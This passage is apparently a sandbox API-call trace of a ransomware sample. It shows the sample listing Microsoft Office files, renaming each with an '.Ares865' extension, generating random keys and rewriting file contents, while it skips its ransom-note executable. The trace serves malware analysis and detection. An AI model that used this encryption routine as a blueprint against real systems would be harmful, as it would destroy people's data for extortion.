RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.479] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9710 [0067.479] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.479] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0067.479] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.479] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.479] CloseHandle (hObject=0x154) returned 1 [0067.479] CloseHandle (hObject=0x120) returned 1 [0067.479] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.479] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0067.479] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.480] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4caf000, ftCreationTime.dwHighDateTime=0x1c5e8f4, ftLastAccessTime.dwLowDateTime=0x51dcda70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4caf000, ftLastWriteTime.dwHighDateTime=0x1c5e8f4, nFileSizeHigh=0x0, nFileSizeLow=0x6082, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DGCOUPON.DPV", cAlternateFileName="")) returned 1 [0067.481] lstrcmpiW (lpString1="DGCOUPON.DPV", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.481] lstrcmpiW (lpString1="DGCOUPON.DPV", lpString2="aoldtz.exe") returned 1 [0067.481] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCOUPON.XML.Ares865") returned 70 [0067.481] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCOUPON.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgcoupon.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCOUPON.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgcoupon.xml.ares865"), dwFlags=0x1) returned 1 [0067.482] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCOUPON.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgcoupon.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0067.482] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=642) returned 1 [0067.482] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.483] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.483] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.484] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0067.484] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.484] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.484] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x590, lpName=0x0) returned 0x154 [0067.486] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x590) returned 0x190000 [0067.487] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0067.487] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.487] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.487] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0067.487] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0067.487] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.487] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.487] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.487] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.488] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0067.488] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.488] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0067.488] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.488] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.488] CloseHandle (hObject=0x154) returned 1 [0067.488] CloseHandle (hObject=0x120) returned 1 [0067.488] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.488] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.488] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.488] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8274200, ftCreationTime.dwHighDateTime=0x1c5d95d, ftLastAccessTime.dwLowDateTime=0x51dcda70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe8274200, ftLastWriteTime.dwHighDateTime=0x1c5d95d, nFileSizeHigh=0x0, nFileSizeLow=0x1800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DGDOTS.DPV", cAlternateFileName="")) returned 1 [0067.488] lstrcmpiW (lpString1="DGDOTS.DPV", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.488] lstrcmpiW (lpString1="DGDOTS.DPV", lpString2="aoldtz.exe") returned 1 [0067.488] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGDOTS.XML.Ares865") returned 68 [0067.489] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGDOTS.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgdots.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGDOTS.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgdots.xml.ares865"), dwFlags=0x1) returned 1 [0067.491] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGDOTS.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgdots.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0067.491] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=690) returned 1 [0067.491] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.491] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.491] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.491] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0067.492] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.492] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.492] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5c0, lpName=0x0) returned 0x164 [0067.493] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5c0) returned 0x1a0000 [0067.494] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0067.495] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.495] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.495] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0067.495] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0067.495] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.495] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.495] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.495] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.495] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9710 [0067.495] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.495] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0067.495] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.495] UnmapViewOfFile (lpBaseAddress=0x1a0000) returned 1 [0067.496] CloseHandle (hObject=0x164) returned 1 [0067.496] CloseHandle (hObject=0x120) returned 1 [0067.496] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.496] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.496] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.496] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38629c00, ftCreationTime.dwHighDateTime=0x1ca08e5, ftLastAccessTime.dwLowDateTime=0x51dcda70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x38629c00, ftLastWriteTime.dwHighDateTime=0x1ca08e5, nFileSizeHigh=0x0, nFileSizeLow=0x1ba4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DGHEADING.XML", cAlternateFileName="DGHEAD~1.XML")) returned 1 [0067.496] lstrcmpiW (lpString1="DGHEADING.XML", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.496] lstrcmpiW (lpString1="DGHEADING.XML", lpString2="aoldtz.exe") returned 1 [0067.496] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGHEADING.XML.Ares865") returned 71 [0067.496] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGHEADING.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgheading.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGHEADING.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgheading.xml.ares865"), dwFlags=0x1) returned 1 [0067.498] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGHEADING.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgheading.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0067.498] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=7076) returned 1 [0067.498] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.498] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.498] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.498] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0067.499] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.499] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.499] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1eb0, lpName=0x0) returned 0x164 [0067.500] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1eb0) returned 0x1a0000 [0067.502] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0067.503] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.503] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.503] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0067.503] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0067.503] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.503] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.503] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.503] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.503] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0067.503] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.503] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0067.503] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.503] UnmapViewOfFile (lpBaseAddress=0x1a0000) returned 1 [0067.503] CloseHandle (hObject=0x164) returned 1 [0067.503] CloseHandle (hObject=0x120) returned 1 [0067.503] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.503] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.503] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.504] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8274200, ftCreationTime.dwHighDateTime=0x1c5d95d, ftLastAccessTime.dwLowDateTime=0x60760930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe8274200, ftLastWriteTime.dwHighDateTime=0x1c5d95d, nFileSizeHigh=0x0, nFileSizeLow=0x2400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DGLINACC.DPV", cAlternateFileName="")) returned 1 [0067.504] lstrcmpiW (lpString1="DGLINACC.DPV", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.504] lstrcmpiW (lpString1="DGLINACC.DPV", lpString2="aoldtz.exe") returned 1 [0067.504] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGLINACC.XML.Ares865") returned 70 [0067.504] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGLINACC.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dglinacc.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGLINACC.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dglinacc.xml.ares865"), dwFlags=0x1) returned 1 [0067.504] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGLINACC.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dglinacc.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0067.505] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=542) returned 1 [0067.505] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.505] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.505] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.505] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0067.506] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.506] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.506] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x520, lpName=0x0) returned 0x164 [0067.507] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x520) returned 0x1a0000 [0067.508] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0067.509] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.509] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.509] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0067.509] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0067.509] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.509] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.509] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.509] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.509] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9710 [0067.509] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.509] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0067.509] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.509] UnmapViewOfFile (lpBaseAddress=0x1a0000) returned 1 [0067.509] CloseHandle (hObject=0x164) returned 1 [0067.509] CloseHandle (hObject=0x120) returned 1 [0067.509] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.509] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.510] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.510] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef4e5000, ftCreationTime.dwHighDateTime=0x1c5d95d, ftLastAccessTime.dwLowDateTime=0x51df3bd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xef4e5000, ftLastWriteTime.dwHighDateTime=0x1c5d95d, nFileSizeHigh=0x0, nFileSizeLow=0x2ebf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DGLOGO.DPV", cAlternateFileName="")) returned 1 [0067.510] lstrcmpiW (lpString1="DGLOGO.DPV", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.510] lstrcmpiW (lpString1="DGLOGO.DPV", lpString2="aoldtz.exe") returned 1 [0067.510] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGLOGO.XML.Ares865") returned 68 [0067.510] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGLOGO.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dglogo.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGLOGO.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dglogo.xml.ares865"), dwFlags=0x1) returned 1 [0067.511] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGLOGO.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dglogo.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0067.511] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1964) returned 1 [0067.511] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.512] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.512] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.512] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0067.512] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.512] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.513] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xab0, lpName=0x0) returned 0x164 [0067.514] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xab0) returned 0x1a0000 [0067.515] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0067.516] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.516] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0067.516] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0067.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0067.516] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.516] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3251f8 [0067.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.516] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x325310 [0067.516] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9710 [0067.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x325310 | out: hHeap=0x2b0000) returned 1 [0067.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0067.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3251f8 | out: hHeap=0x2b0000) returned 1 [0067.516] UnmapViewOfFile (lpBaseAddress=0x1a0000) returned 1 [0067.516] CloseHandle (hObject=0x164) returned 1 [0067.516] CloseHandle (hObject=0x120) returned 1 [0067.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.517] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0d1c200, ftCreationTime.dwHighDateTime=0x1ca579b, ftLastAccessTime.dwLowDateTime=0x60760930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc0d1c200, ftLastWriteTime.dwHighDateTime=0x1ca579b, nFileSizeHigh=0x0, nFileSizeLow=0xe39, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DGMAIN.XML", cAlternateFileName="")) returned 1 [0067.517] lstrcmpiW (lpString1="DGMAIN.XML", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.517] lstrcmpiW (lpString1="DGMAIN.XML", lpString2="aoldtz.exe") returned 1 [0067.517] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft 